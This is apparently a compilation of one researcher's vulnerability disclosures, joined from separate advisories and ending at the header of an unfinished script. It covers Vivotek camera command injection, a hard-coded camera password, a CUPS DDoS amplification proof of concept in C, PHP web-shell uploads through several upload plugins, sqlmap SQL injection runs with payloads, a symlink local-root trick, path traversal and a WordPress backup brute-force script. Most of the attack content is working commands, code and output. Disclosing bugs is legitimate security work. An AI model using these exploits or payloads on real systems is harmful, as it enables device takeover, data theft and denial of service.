Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Vivotek Affected device model numbers are FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391,FE9180,FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371,IB9381, IB9387, IB9389, IB939,IP9165,IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 (Firmware modules) allows OS Command Injection.This issue affects Affected device model numbers are FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391,FE9180,FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371,IB9381, IB9387, IB9389, IB939,IP9165,IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330: 0100a, 0106a, 0106b, 0107a, 0107b_1, 0109a, 0112a, 0113a, 0113d, 0117b, 0119e, 0120b, 0121, 0121d, 0121d_48573_1, 0122e, 0124d_48573_1, 012501, 012502, 0125c.
Because we were unable to obtain the specific model of camera of our own we configured a machine to emulate the architecture and environment of a vulnerable camera.
The following criteria need to be met in order to exploit the vulnerability:
The file size must be under 5MB.
The calling script must be upload_map.cgi not file_manger.cgi you can’t access file_manager.cgi directly the code checks for this which I will highlight below.
The uploaded binary must pass a firmware verification check.
The /usr/sbin/confclient binary must be intact and return the following string capability_remotecamctrl_master=1
The boa webserver included in the firmware is customized and uses non standard environment variables to pass data to cgi-bin binaries.
#!/bin/bash
TEMP_DIR=/tmp
# Create a minimal firmware file
# The validate_firmware_file checks for magic bytes: FF V FF FF (at start) and FF K FF FF (at end)
echo "[*] Creating test firmware file..."
# Create fake firmware with proper magic bytes
FIRMWARE_FILE="$TEMP_DIR/firmware.bin"
# Write the magic header: FF V FF FF
printf '\xFF\x56\xFF\xFF' > "$FIRMWARE_FILE"
# Add padding and fake firmware data
dd if=/dev/zero bs=1 count=1000 >> "$FIRMWARE_FILE" 2>/dev/null
# Write the magic footer: FF K FF FF
printf '\xFF\x4B\xFF\xFF' >> "$FIRMWARE_FILE"
echo "[+] Firmware file created: $FIRMWARE_FILE"
ls -lh "$FIRMWARE_FILE"
echo ""
Bash script used to create valid dummy firmware images.
The CONTENT_LENGTH value just needs to be above 0 and below 5MB.
export REQUEST_METHOD=POST
export CONTENT_LENGTH=55123
export QUERY_STRING=camid=1
export SCRIPT_NAME=upload_map.cgi
export POST_FILE_NAME="test_firmware.bin;id;"
export SCRIPT_NAME=upload_map.cgi
The environment variables used to execute the cgi-bin binary.
# /usr/share/www/cgi-bin/upload_map.cgi
Content-type: text/html
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><script type='text/javascript' src='/include/common.js'></script>
</head>
<body>upload_result='0';upload_msg='upload_successfully';ip='';port='0';username='';passwd='';</body></html>mv: missing destination file operand after 'test_firmware.bin'
Try 'mv --help' for more information.
uid=0(root) gid=0(root) groups=0(root)
The resulting output of id being passed into the system() function.
[pid 360278] execve("/bin/sh", ["sh", "-c", "mv test_firmware.bin;id; /mnt/fl"...], 0x555587d277c0 /* 22 vars */ <unfinished ...>
[pid 360279] <... clock_nanosleep resumed> <unfinished ...>) = ?
[pid 360279] +++ exited with 0 +++
[pid 360278] <... execve resumed>) = 0
[[pid 360278] newfstatat(AT_FDCWD, "/usr/bin/mv", {st_mode=S_IFREG|0755, st_size=137752, ...}, 0) = 0
[pid 360278] rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], NULL, 8) = 0
[pid 360278] vfork(strace: Process 360280 attached
<unfinished ...>
[pid 360280] rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
[pid 360280] execve("/usr/bin/mv", ["mv", "test_firmware.bin"], 0x60c637838788 /* 22 vars */ <unfinished ...>
[pid 360278] <... vfork resumed>) = 360280
.
.
.
[pid 360280] write(2, "mv: ", 4mv: ) = 4
[pid 360280] write(2, "missing destination file operand"..., 58missing destination file operand after 'test_firmware.bin') = 58
[pid 360280] write(2, "\n", 1
) = 1
[pid 360280] write(2, "Try 'mv --help' for more informa"..., 38Try 'mv --help' for more information.
) = 38
[pid 360281] rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
[pid 360281] execve("/usr/bin/id", ["id"], 0x60c637838788 /* 22 vars */ <unfinished ...>
[pid 360278] <... vfork resumed>) = 360281
[pid 360278] rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
[pid 360278] wait4(-1, <unfinished ...>
[pid 360281] <... execve resumed>) = 0
.
.
.
[pid 360281] close(4) = 0
[pid 360281] write(1, "uid=0(root) gid=0(root) groups=0"..., 39uid=0(root) gid=0(root) groups=0(root)
) = 39
snprintf() is being used to format the string “mv %s %s” with user supplied input and then that string is passed to the system() function. This is where our command injection occurs. By supplying a specially crafted filename with shell commands embedded in it we can execute commands as the http servers user id which is root. 0x00009a84 e4109fe5 ldr r1, [0x00009b70] ; [0x9b70:4]=511 0x00009a88 e4209fe5 ldr r2, str.mv__s__s ; [0xc348:4]=0x2520766d ; "mv %s %s" 0x00009a8c 00308de5 str r3, [sp] 0x00009a90 de0f8de2 add r0, var_378h 0x00009a94 0930a0e1 mov r3, sb ; 0xc44c ; "POST_FILE_NAME" 0x00009a98 effbffeb bl sym.imp.snprintf 0x00009a9c de0f8de2 add r0, var_378h 0x00009aa0 05fcffeb bl sym.imp.system
A default password of mpeg4soc was found on firmware for the following camera model numbers FD7131-VVTK,FD7131-VVTK,FD7131-VVTK,FD7141-VVTK,IP7131-VVTK,IP7133-VVTK,IP7133-VVTK,IP7133-VVTK,IP7134-VVTK,IP7135-VVTK,IP7135-VVTK,IP7135-VVTK,IP7135-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7137-VVTK,IP7138-VVTK,IP7142-VVTK,IP7142-VVTK,IP7151-VVTK,IP7152-VVTK,IP7153-VVTK,IP7153-VVTK,IP7154-VVTK,IP7330-VVTK,IP7330-VVTK,IP7330-VVTK,IP8131-VVTK,IP8131-VVTK,IP8131-VVTK,IP8131W-VVTK,PT7135-VVTK,PT7137-TCON,PT7137-VVTK,PT7137-VVTK,PT7137-VVTK,PT7137-VVTK,PZ7131-VVTK,PZ7131-VVTK,PZ71X1-VVTK,PZ71X1-VVTK,PZ71X2-VVTK,SD73X3-VVTK,SD73X3-VVTK,SD73X3-VVTK,TC5330-VVTK,TC5332-TCVV,TC5333-TCVV,TC5633-TCVV,TC5633-VVTK,VS7100-VVTK,VS7100-VVTK,VS7100-VVTK.
There is an unauthenticated remote command injection in /cgi-bin/admin/eventtask.cgi that allows a user to run arbitrary commands on a vulnerable host. The only reference to this endpoint is here: https://archify-images-prod.s3.ap-southeast-1.amazonaws.com/catalog/product_files_other/4b53r-pua2f-1643099534md8563-eh-vvtk-0122a_beta2_release_note.pdf So, I believe it's a duplicate but asking vendor to confirm.
https://github.com/bsmithbuf/VIVOTEK_CVE_2019_19936 This will check if you're vulnerable: $ curl -v http://192.168.0.132/cgi-bin/admin/eventtask.cgi * Trying 192.168.0.132:80... * Connected to 192.168.0.132 (192.168.0.132) port 80 > GET /cgi-bin/admin/eventtask.cgi HTTP/1.1 > Host: 192.168.0.132 > User-Agent: curl/8.5.0 > Accept: */* > < HTTP/1.1 200 OK < Date: Mon, 03 Jan 2000 01:41:09 GMT < Server: Boa/0.94.14rc21 < Accept-Ranges: bytes < Connection: close < Content-type: text/plain < Missing parameter
https://archify-images-prod.s3.ap-southeast-1.amazonaws.com/catalog/product_files_other/4b53r-pua2f-1643099534md8563-eh-vvtk-0122a_beta2_release_note.pdf
The problem arises when an attacker sends a crafted packet specifying the address of a target as a printer to be added. For each packet sent, the vulnerable CUPS server will generate a larger and partially attacker-controlled IPP/HTTP request directed at the specified target. As a result, not only is the target affected, but the host of the CUPS server also becomes a victim, as the attack consumes its network bandwidth and CPU resources.
// Larry Cashdollar Akamai SIRT
// Testing amplification and reflection vector of Evilsocket's CUPS vulnerability
// https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
void send_browsed_packet(const char *ip, int port, const char *ipp_server_host, int ipp_server_port, const char *payload) {
printf("Sending UDP Payload to target %s and port %d\n", ipp_server_host, ipp_server_port);
int printer_type = 0x00;
int printer_state = 0x03;
char printer_uri[256];
snprintf(printer_uri, sizeof(printer_uri), "http://%s:%d/printers/%s", ipp_server_host, ipp_server_port, payload);
const char *printer_location = "Office HQ";
const char *printer_info = "Printer";
char message[512];
snprintf(message, sizeof(message), "%x %x %s \"%s\" \"%s\"",
printer_type,
printer_state,
printer_uri,
printer_location,
printer_info);
printf("Byte Size: %lu\n", strlen(message));
int sock;
struct sockaddr_in server_addr;
sock = socket(AF_INET, SOCK_DGRAM, 0);
if (sock < 0) {
perror("Socket creation failed");
return;
}
memset(&server_addr, 0, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);
if (inet_pton(AF_INET, ip, &server_addr.sin_addr) <= 0) {
perror("Invalid IP address");
close(sock);
return;
}
sendto(sock, message, strlen(message), 0, (struct sockaddr *)&server_addr, sizeof(server_addr));
close(sock);
}
int main(int argc, char *argv[]) {
if (argc < 5) {
printf("CUPS Browsed Amplification Test PoC script - Larry Cashdollar Akamai.\n");
printf("Usage: reflector_IP Port target target_port\n");
return 1;
}
const char *reflector = argv[1];
int ref_port = atoi(argv[2]);
const char *target = argv[3];
int tar_port = atoi(argv[4]);
const char *payload = argv[4];
send_browsed_packet(reflector, ref_port, target, tar_port, payload);
return 0;
}
https://www.msn.com/en-gb/money/technology/ddos-attacks-can-be-amplified-by-cups-flaw/ar-AA1rItbc https://www.secureblink.com/cyber-security-news/critical-cups-vulnerability-enables-600x-d-do-s-attack-amplification-1 https://heimdalsecurity.com/blog/cups-vulnerability/ https://www.rewterz.com/threat-advisory/recently-patched-vulnerability-in-cups-allows-ddos-attacks-to-be-amplified https://www.acaglobal.com/insights/vulnerabilities-discovered-common-unix-printing-system-cups-can-enable-ddos-attacks https://cyberinsider.com/over-58000-endpoints-vulnerable-to-600x-amplification-attacks/ https://informationsecuritybuzz.com/new-ddos-attack-vector-discovered-cups/ https://www.theregister.com/2024/10/07/critical_cups_vulnerability_chain_easy/ https://it.slashdot.org/story/24/10/05/0413201/akamai-warns-cups-vulnerability-also-brings-new-threat-of-ddos-attacks https://www.techradar.com/pro/security/ddos-attacks-can-be-amplified-by-cups-flaw https://www.computerweekly.com/news/366612800/Cups-Linux-printing-bugs-open-door-to-DDoS-attacks-says-Akamai https://www.teiss.co.uk/news/news-scroller/experts-warn-of-ddos-attacks-exploiting-linux-printing-vulnerabilities-14720 https://www.bleepingcomputer.com/news/security/recently-patched-cups-flaw-can-be-used-to-amplify-ddos-attacks/ https://securityonline.info/cups-exploit-turns-common-devices-into-ddos-weapons/ https://www.msspalert.com/brief/cups-vulnerabilities-could-lead-to-widespread-attacks https://www.scworld.com/brief/ddos-attacks-possible-with-exploitation-of-cups-vulnerabilities https://www.helpnetsecurity.com/2024/10/03/cups-vulnerabilities-ddos/ https://www.darkreading.com/vulnerabilities-threats/unix-printing-vulnerabilities-easy-ddos-attacks https://therecord.media/ddos-attacks-cups-linux-print-vulnerability https://www.securityweek.com/after-code-execution-researchers-show-how-cups-can-be-abused-for-ddos-attacks/
PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.
curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
nsdb-convert is a script which may be used to convert the contents of a Oracle Solaris 11 format FedFS NSDB to the format supported by the current Oracle Solaris release.
The nsdb-update-nci command marks a distinguished name on an LDAP server as a container for FedFS data by adding the fedfsNsdbContainer-Info object class to the root of the naming context and setting the fedfsNcePrefixR attribute to point to the relative DN from the root of the naming context.
DataTables is a jQuery JavaScript library to convert simple HTML tables to dynamic feature-rich tables. The jQuery DataTables are very user friendly to list records with live add, edit, delete records without page refresh. Due to this, DataTables used widely in web applications to list records.
$ sqlmap -u "http://192.168.0.149/live-add-edit-delete-datatables-php-mysql-demo/ajax_action.php" --data "draw=153&columns[0][data]=0&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=false&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=5&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=6&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=false&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=7&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=false&columns[7][search][value]=&columns[7][search][regex]=false&order[0][column]=3&order[0][dir]=asc&start=0&length=10&search[value]="+and+"1&search[regex]=false&action=listRecords" -p "search[value]" --method POST --dbms=mysql --level 2 --risk 2
___
__H__
___ ___[']_____ ___ ___ {1.1#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:38:51
[10:38:52] [INFO] testing connection to the target URL
[10:38:52] [INFO] testing if the target URL is stable
[10:38:53] [INFO] target URL is stable
[10:38:53] [WARNING] heuristic (basic) test shows that POST parameter 'search[value]' might not be injectable
[10:38:53] [INFO] testing for SQL injection on POST parameter 'search[value]'
[10:38:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[10:38:56] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[10:38:56] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[10:38:56] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:38:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[10:38:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[10:38:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[10:38:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:39:00] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:39:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:39:01] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:39:01] [INFO] testing 'MySQL inline queries'
[10:39:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[10:39:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:39:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:39:53] [INFO] POST parameter 'search[value]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] y
[10:40:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:40:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:40:00] [INFO] target URL appears to be UNION injectable with 6 columns
[10:40:00] [INFO] POST parameter 'search[value]' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search[value]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
---
Parameter: search[value] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: draw=153&columns[0][data]=0&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=false&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=5&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=6&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=false&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=7&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=false&columns[7][search][value]=&columns[7][search][regex]=false&order[0][column]=3&order[0][dir]=asc&start=0&length=10&search[value]= and 1") AND (SELECT * FROM (SELECT(SLEEP(5)))KGDc) AND ("Aejs"="Aejs&search[regex]=false&action=listRecords
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: draw=153&columns[0][data]=0&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=false&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=5&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=6&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=false&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=7&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=false&columns[7][search][value]=&columns[7][search][regex]=false&order[0][column]=3&order[0][dir]=asc&start=0&length=10&search[value]= and 1") UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162717671,0x5a6b657a455263557478797469434e4f506b596f4e5a585668496b6e7464796e6a6f6a596e656b4e,0x717a767171),NULL-- SkNj&search[regex]=false&action=listRecords
---
[10:40:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:40:02] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 31 times
[10:40:02] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.149'
"The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."
Tested on Solaris 11 x86 larry@SolSun:~$ uname -a SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc and Open Indiana root@openindiana:/export/home/larry# uname -a SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc Append content to /etc/passwd larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log To get local root simply have ddu chmod 666 /etc/shadow larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done A better exploit: https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6 https://www.oracle.com/security-alerts/cpujul2020.html#AppendixSUNS
upload-image-with-ajax
$ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php fileUpload POST request size is 482 bytes Sending Payload: POST /upload-image-with-ajax/upload.php HTTP/1.1 Host: 192.168.0.3 User-Agent: File Upload Exploiter/v1.2 Accept: */* Content-Length: 251 Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853 --------------------------c8e05c8871143853 Content-Disposition: form-data; name="fileUpload"; filename="shell.php" Content-Type: application/octet-stream <?php $cmd=$_GET['cmd']; system($cmd);?> --------------------------c8e05c8871143853-- HTTP/1.1 200 OK Date: Tue, 24 Dec 2019 12:16:57 GMT Server: Apache/2.4.25 (Debian) Vary: Accept-Encoding Content-Length: 96 Content-Type: text/html; charset=UTF-8 was not an image<br><h2> application/octet-stream</h2>file size is 42<br>upload successful! [+] Total bytes read: 267
Author fixed vulnerability: https://github.com/abcprintf/upload-image-with-ajax/commit/71436ba5102010397519d4b25ea57591cfb4974c
"Online store system" is a drop in customizable electronic storefront. It has an administrative interface allowing user and product management.
Set login name or email to "><script>alert(1);</script> $ curl -s cookie.txt -X POST -d "username=jsmith&password=jsmith123&email=\"><script>alert(1);</script>%40email.com" http://example.com/pso/sent_register.php $ curl -s cookie.txt "http://example.com/pso/admin/delete_file.php?id=0&filename=../women.php" $ curl -s cookie.txt http://example.com/pso/admin/product_delete.php?id=4
PHP-based server-side example for handling traditional endpoint requests from Fine Uploader
https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9209
Author deleted his software repository instead.
picture cut is a jquery plugin that handles images in a very friendly and simple way, with a beautiful interface based on bootstrap or jquery ui, has great features like ajax upload, drag image from explorer, image crop and others.
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php With folderOnServer=/ the shell will be in the main web directory path.
jQuery Upload File plugin provides Multiple file Uploads with progress bar.Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
$ curl -F "myfile=@shell.php" "http://example.com/jquery-upload-file/php/upload.php" ["shell.php"] Where shell is https://github.com/lcashdol/shittyshell/blob/master/shittyshell.php Shell is located http://example.com/jquery-upload-file/php/uploads/shell.php
Tajer – All In One eCommerce WordPress Premium Class Plugin. You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products.
curl -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php
File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd);?> Or https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206
Actively being exploited in the wild. https://github.com/blueimp/jQuery-File-Upload/pull/3514 The author includes a .htaccess under server/php/files that attempt to force the file as a download and change the file extension to .html. .htaccess with comments removed: SetHandler default-handler ForceType application/octet-stream Header set Content-Disposition attachment <FilesMatch "(?i)\.(gif|jpe?g|png)$"> ForceType none Header unset Content-Disposition </FilesMatch> Header set X-Content-Type-Options nosniff Testing this on default versions of Ubuntu and Debian: If I enable AllowOverride All in /etc/apache2/apache2.conf for the directory /var/www I get an Internal Server Error. The error log states: Invalid command 'Header', perhaps misspelled or defined by a module not included in the server configuration. So it seems the default apache configuration is missing mod_headers. https://httpd.apache.org/docs/current/mod/mod_headers.html root@debian:/etc/apache2/mods-enabled# ln -s ../mods-available/headers.load root@debian:/etc/apache2/mods-enabled# /etc/init.d/apache2 restart [ ok ] Restarting apache2 (via systemctl): apache2.service. http://example.com/jQuery-File-Upload-9.22.0/server/php/files/shell.php?cmd=uptime Now the above downloads shell.html as the software author intended.
This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date.
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql
Where post_data is:
POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'
[*] shutting down at 11:50:08
CVE-2018-1002001
http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
"The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CWE-552: Files or Directories Accessible to External Parties
#CVE-ID: CVE-2017-2551
#Google Dork: inurl:wp-content/uploads/backwpup
#Add banner about vulnerability
KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=07
YEAR=2017
Z=0
echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
for x in `seq -w 0 59`; do
Y=`echo "scale=2;($Z/86000)*100"|bc`;
echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
for z in `seq -w 0 59`; do
Z=$(( $Z + 1 ));
CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
RESULT=`curl -s --head $CWPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo ""
echo "[+] Location $CWPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
# wget $CWPATH
exit;
fi;
done
done
done
echo "Completed."
Google Dork: inurl:wp-content/uploads/backwpup
Easy Joomla Backup creates 'old-school' backups without any frills.
#!/bin/bash
#Larry W. Cashdollar, @_larry0 9/7/2017
#Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
#https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
